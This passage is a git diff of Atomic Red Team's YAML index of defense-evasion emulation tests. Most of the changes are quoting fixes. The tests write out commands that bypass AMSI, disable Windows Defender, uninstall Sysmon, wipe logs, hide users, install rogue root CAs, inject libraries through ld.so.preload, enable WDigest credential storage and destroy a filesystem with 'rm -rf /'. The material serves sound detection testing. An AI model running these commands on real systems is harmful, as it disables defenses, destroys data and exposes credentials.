-' + ' get_prereq_command: | $parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip" New-Item -ItemType Directory $parentpath -Force | Out-Null @@ -29770,20 +29818,20 @@ defense-evasion: if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"} - description: 'Sysmon must be installed -' + ' prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1} -' + ' get_prereq_command: 'cmd /c sysmon -i -accepteula -' + ' executor: command: 'sysmon -u -' + ' cleanup_command: 'sysmon -i -accepteula >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: AMSI Bypass - AMSI InitFailed @@ -29811,11 +29859,11 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse -' + ' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null -' + ' name: powershell elevation_required: true - name: Disable Arbitrary Security Windows Service @@ -29889,11 +29937,11 @@ defense-evasion: command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -' + ' cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0 -' + ' name: powershell elevation_required: true - name: Disable Microsoft Office Security Features @@ -29933,7 +29981,7 @@ defense-evasion: command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -' + ' name: command_prompt elevation_required: true - name: Stop and Remove Arbitrary Security Windows Service @@ -29943,7 +29991,7 @@ defense-evasion: The Remove-Service cmdlet removes a Windows service in the registry and in the service database. -' + ' supported_platforms: - windows input_arguments: @@ -29964,7 +30012,7 @@ defense-evasion: is located in a folder named with a random guid we need to identify it before invoking the uninstaller. -' + ' supported_platforms: - windows input_arguments: @@ -30376,10 +30424,10 @@ defense-evasion: dependencies: - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" @@ -30855,7 +30903,7 @@ defense-evasion: auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480 description: 'Delete a single file from the temporary directory -' + ' supported_platforms: - linux - macos @@ -30867,14 +30915,14 @@ defense-evasion: executor: command: 'rm -f #{file_to_delete} -' + ' name: sh - name: Delete an entire folder - Linux/macOS auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e description: 'Recursively delete the temporary directory and all files contained within it -' + ' supported_platforms: - linux - macos @@ -30886,14 +30934,14 @@ defense-evasion: executor: command: 'rm -rf #{folder_to_delete} -' + ' name: sh - name: Overwrite and delete a file with shred auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499' description: 'Use the `shred` command to overwrite the temporary file and then delete it -' + ' supported_platforms: - linux input_arguments: @@ -30904,7 +30952,7 @@ defense-evasion: executor: command: 'shred -u #{file_to_shred} -' + ' name: sh - name: Delete a single file - Windows cmd auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3 @@ -30924,17 +30972,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete} -' + ' executor: command: 'del /f #{file_to_delete} -' + ' name: command_prompt - name: Delete an entire folder - Windows cmd auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698 @@ -30954,17 +31002,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'mkdir #{folder_to_delete} -' + ' executor: command: 'rmdir /s /q #{folder_to_delete} -' + ' name: command_prompt - name: Delete a single file - Windows PowerShell auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 @@ -30972,7 +31020,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -30986,17 +31034,17 @@ defense-evasion: - description: 'The file to delete must exist on disk at specified location (#{file_to_delete}) -' + ' prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null -' + ' executor: command: 'Remove-Item -path #{file_to_delete} -' + ' name: powershell - name: Delete an entire folder - Windows PowerShell auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1 @@ -31004,7 +31052,7 @@ defense-evasion: Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted. -' + ' supported_platforms: - windows input_arguments: @@ -31018,18 +31066,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{folder_to_delete}) -' + ' prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory | Out-Null -' + ' executor: command: 'Remove-Item -Path #{folder_to_delete} -Recurse -' + ' name: powershell - name: Delete Filesystem - Linux auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52 @@ -31037,13 +31085,13 @@ defense-evasion: This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. -' + ' supported_platforms: - linux executor: command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null -' + ' name: bash - name: Delete Prefetch File auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb @@ -31056,7 +31104,7 @@ defense-evasion: command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) -' + ' name: powershell elevation_required: true - name: Delete TeamViewer Log Files @@ -31080,18 +31128,18 @@ defense-evasion: - description: 'The folder to delete must exist on disk at specified location (#{teamviewer_log_file}) -' + ' prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null -' + ' executor: command: 'Remove-Item #{teamviewer_log_file} -' + ' name: powershell T1222: technique: @@ -31234,7 +31282,7 @@ defense-evasion: auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b description: 'Gatekeeper Bypass via command line -' + ' supported_platforms: - macos input_arguments: @@ -31245,7 +31293,7 @@ defense-evasion: executor: command: 'sudo xattr -d com.apple.quarantine #{app_path} -' + ' elevation_required: true name: sh T1484: @@ -31472,7 +31520,7 @@ defense-evasion: auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be description: 'Creates a hidden file inside a hidden directory -' + ' supported_platforms: - linux - macos @@ -31482,20 +31530,20 @@ defense-evasion: echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ -' + ' name: sh - name: Mac Hidden file auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9 description: 'Hide a file on MacOS -' + ' supported_platforms: - macos executor: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" -' + ' name: sh - name: Create Windows System File with Attrib auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32 @@ -31513,20 +31561,20 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +s #{file_to_modify} -' + ' cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Windows Hidden File with Attrib @@ -31545,27 +31593,27 @@ defense-evasion: dependencies: - description: 'The file must exist on disk at specified location (#{file_to_modify}) -' + ' prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify} -' + ' executor: command: 'attrib.exe +h #{file_to_modify} -' + ' cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Hidden files auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 description: 'Requires Apple Dev Tools -' + ' supported_platforms: - macos input_arguments: @@ -31576,13 +31624,13 @@ defense-evasion: executor: command: 'setfile -a V #{filename} -' + ' name: sh - name: Hide a Directory auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 description: 'Hide a directory on MacOS -' + ' supported_platforms: - macos executor: @@ -31591,22 +31639,22 @@ defense-evasion: chflags hidden /var/tmp/T1564.001_mac.txt cleanup_command: 'rm /var/tmp/T1564.001_mac.txt -' + ' name: sh - name: Show all hidden files auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c description: 'Show all hidden files on MacOS -' + ' supported_platforms: - macos executor: command: 'defaults write com.apple.finder AppleShowAllFiles YES -' + ' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO -' + ' name: sh T1564.002: technique: @@ -31653,7 +31701,7 @@ defense-evasion: description: 'Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) -' + ' supported_platforms: - macos input_arguments: @@ -31664,17 +31712,17 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh - name: Create Hidden User using IsHidden option auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 description: 'Add a hidden user on macOS using IsHidden optoin -' + ' supported_platforms: - macos input_arguments: @@ -31685,10 +31733,10 @@ defense-evasion: executor: command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1 -' + ' cleanup_command: 'sudo dscl . -delete /Users/#{user_name} -' + ' elevation_required: true name: sh T1564.003: @@ -31770,7 +31818,7 @@ defense-evasion: executor: command: 'Start-Process #{powershell_command} -' + ' name: powershell T1564: technique: @@ -31845,7 +31893,7 @@ defense-evasion: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "Word.Application" | Out-Null @@ -31855,7 +31903,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") @@ -31864,7 +31912,7 @@ defense-evasion: Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore -' + ' name: powershell - name: Create a user called "$" as noted here auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 @@ -32042,7 +32090,7 @@ defense-evasion: auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 description: 'Disables history collection in shells -' + ' supported_platforms: - linux - macos @@ -32210,7 +32258,7 @@ defense-evasion: auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 description: 'Emulates modification of auditd configuration files -' + ' supported_platforms: - linux input_arguments: @@ -32241,11 +32289,11 @@ defense-evasion: sed -i '$ d' /etc/#{libaudit_config_file_name} name: bash elevation_required: true - - name: Lgging Configuration Changes on Linux Host + - name: Logging Configuration Changes on Linux Host auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c description: 'Emulates modification of syslog configuration. -' + ' supported_platforms: - linux input_arguments: @@ -32388,10 +32436,10 @@ defense-evasion: executor: command: 'fsutil usn deletejournal /D C: -' + ' cleanup_command: 'fsutil usn createjournal m=1000 a=100 c: -' + ' name: command_prompt elevation_required: true T1202: @@ -32507,7 +32555,7 @@ defense-evasion: executor: command: 'conhost.exe "#{process}" -' + ' name: command_prompt T1553.004: technique: @@ -32605,7 +32653,7 @@ defense-evasion: auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -32634,7 +32682,7 @@ defense-evasion: auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff description: 'Creates a root CA with openssl -' + ' supported_platforms: - linux input_arguments: @@ -32650,10 +32698,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -32667,7 +32715,7 @@ defense-evasion: auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 description: 'Creates a root CA with openssl -' + ' supported_platforms: - macos input_arguments: @@ -32683,10 +32731,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} @@ -32694,14 +32742,14 @@ defense-evasion: command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" -' + ' name: command_prompt elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 description: 'Creates a root CA with Powershell -' + ' supported_platforms: - windows input_arguments: @@ -32713,10 +32761,10 @@ defense-evasion: dependencies: - description: 'Verify the certificate exists. It generates if not on disk. -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -32740,7 +32788,7 @@ defense-evasion: auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f description: 'Creates a root CA with certutil -' + ' supported_platforms: - windows input_arguments: @@ -32752,10 +32800,10 @@ defense-evasion: dependencies: - description: 'Certificate must exist at specified location (#{pfx_path}) -' + ' prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 } -' + ' get_prereq_command: | $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} @@ -32763,7 +32811,7 @@ defense-evasion: executor: command: 'certutil -addstore my #{pfx_path} -' + ' cleanup_command: | $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore @@ -32850,10 +32898,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -32918,10 +32966,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -32964,7 +33012,7 @@ defense-evasion: description: 'Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -32989,10 +33037,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -33035,7 +33083,7 @@ defense-evasion: description: 'Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -33060,10 +33108,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -33106,7 +33154,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -33131,10 +33179,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -33178,7 +33226,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. -' + ' supported_platforms: - windows input_arguments: @@ -33203,10 +33251,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -33249,7 +33297,7 @@ defense-evasion: description: 'Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. -' + ' supported_platforms: - windows input_arguments: @@ -33274,10 +33322,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -33331,10 +33379,10 @@ defense-evasion: - description: 'InstallUtil test harness script must be installed at specified location (#{test_harness}) -' + ' prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}" @@ -33559,21 +33607,21 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -33598,18 +33646,18 @@ defense-evasion: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1222.002: technique: @@ -33665,7 +33713,7 @@ defense-evasion: description: 'Changes a file or folder''s permissions using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -33681,14 +33729,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3 description: 'Changes a file or folder''s permissions using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -33704,14 +33752,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} -' + ' name: bash - name: chmod - Change file or folder mode (numeric mode) recursively auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4 description: 'Changes a file or folder''s permissions recursively using chmod and a specified numeric mode. -' + ' supported_platforms: - macos - linux @@ -33727,14 +33775,14 @@ defense-evasion: executor: command: 'chmod #{numeric_mode} #{file_or_folder} -R -' + ' name: bash - name: chmod - Change file or folder mode (symbolic mode) recursively auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f description: 'Changes a file or folder''s permissions recursively using chmod and a specified symbolic mode. -' + ' supported_platforms: - macos - linux @@ -33750,14 +33798,14 @@ defense-evasion: executor: command: 'chmod #{symbolic_mode} #{file_or_folder} -R -' + ' name: bash - name: chown - Change file or folder ownership and group auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0 description: 'Changes a file or folder''s ownership and group information using chown. -' + ' supported_platforms: - macos - linux @@ -33777,14 +33825,14 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership and group recursively auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848 description: 'Changes a file or folder''s ownership and group information recursively using chown. -' + ' supported_platforms: - macos - linux @@ -33804,13 +33852,13 @@ defense-evasion: executor: command: 'chown #{owner}:#{group} #{file_or_folder} -R -' + ' name: bash - name: chown - Change file or folder mode ownership only auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99 description: 'Changes a file or folder''s ownership only using chown. -' + ' supported_platforms: - macos - linux @@ -33826,13 +33874,13 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} -' + ' name: bash - name: chown - Change file or folder ownership recursively auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 description: 'Changes a file or folder''s ownership only recursively using chown. -' + ' supported_platforms: - macos - linux @@ -33848,7 +33896,7 @@ defense-evasion: executor: command: 'chown #{owner} #{file_or_folder} -R -' + ' name: bash - name: chattr - Remove immutable file attribute auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f @@ -33866,7 +33914,7 @@ defense-evasion: executor: command: 'chattr -i #{file_to_modify} -' + ' name: sh T1078.003: technique: @@ -33981,7 +34029,7 @@ defense-evasion: C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -34001,10 +34049,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}" @@ -34017,7 +34065,7 @@ defense-evasion: Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. -' + ' supported_platforms: - windows input_arguments: @@ -34037,10 +34085,10 @@ defense-evasion: dependencies: - description: 'Project file must exist on disk at specified location (#{filename}) -' + ' prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}" @@ -34174,7 +34222,7 @@ defense-evasion: schtasks /query /tn win32times cleanup_command: 'schtasks /tn win32times /delete /f -' + ' name: command_prompt elevation_required: true - name: Creating W32Time similar named service using sc @@ -34189,7 +34237,7 @@ defense-evasion: sc qc win32times cleanup_command: 'sc delete win32times -' + ' name: command_prompt elevation_required: true T1036: @@ -34539,11 +34587,11 @@ defense-evasion: command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f -' + ' cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify Registry of Local Machine - cmd @@ -34563,11 +34611,11 @@ defense-evasion: command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f -' + ' cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Modify registry to store logon credentials @@ -34582,11 +34630,11 @@ defense-evasion: command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f -' + ' cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Add domain to Trusted sites Zone @@ -34627,11 +34675,11 @@ defense-evasion: command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "